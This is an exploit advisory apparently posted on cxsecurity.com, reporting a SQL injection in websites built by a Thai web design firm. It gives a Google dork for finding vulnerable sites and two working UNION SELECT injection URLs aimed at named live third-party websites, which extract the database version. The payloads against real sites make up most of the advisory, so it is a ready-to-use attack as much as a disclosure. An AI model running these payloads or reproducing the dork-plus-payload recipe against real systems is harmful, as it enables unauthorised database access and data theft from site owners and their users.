โดยบริษัท รับทำเว็บไซต์ - Sql Injection Vulnerability

2021.10.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

********************************************************* #Exploit Title: โดยบริษัท รับทำเว็บไซต์ - Sql Injection Vulnerability #Date: 2021-10-10 #Exploit Author: Behrouz Mansoori #Google Dork: "Web Design โดยบริษัท รับทำเว็บไซต์" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Web Design โดยบริษัท รับทำเว็บไซต์" ### Demo : https://qualitechplc.com/page-text.php?id=59129aacfb6cebbe2c52f30ef3424209f7252e82%27%20union%20select%201,2,3,4,5,version(),7,8,9,10--+ http://www.misstarbydavika.com/product.php?sid=-2%20/*!12345union*/%20select%201,2,version(),4-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: mr.mansoori@yahoo.com *********************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top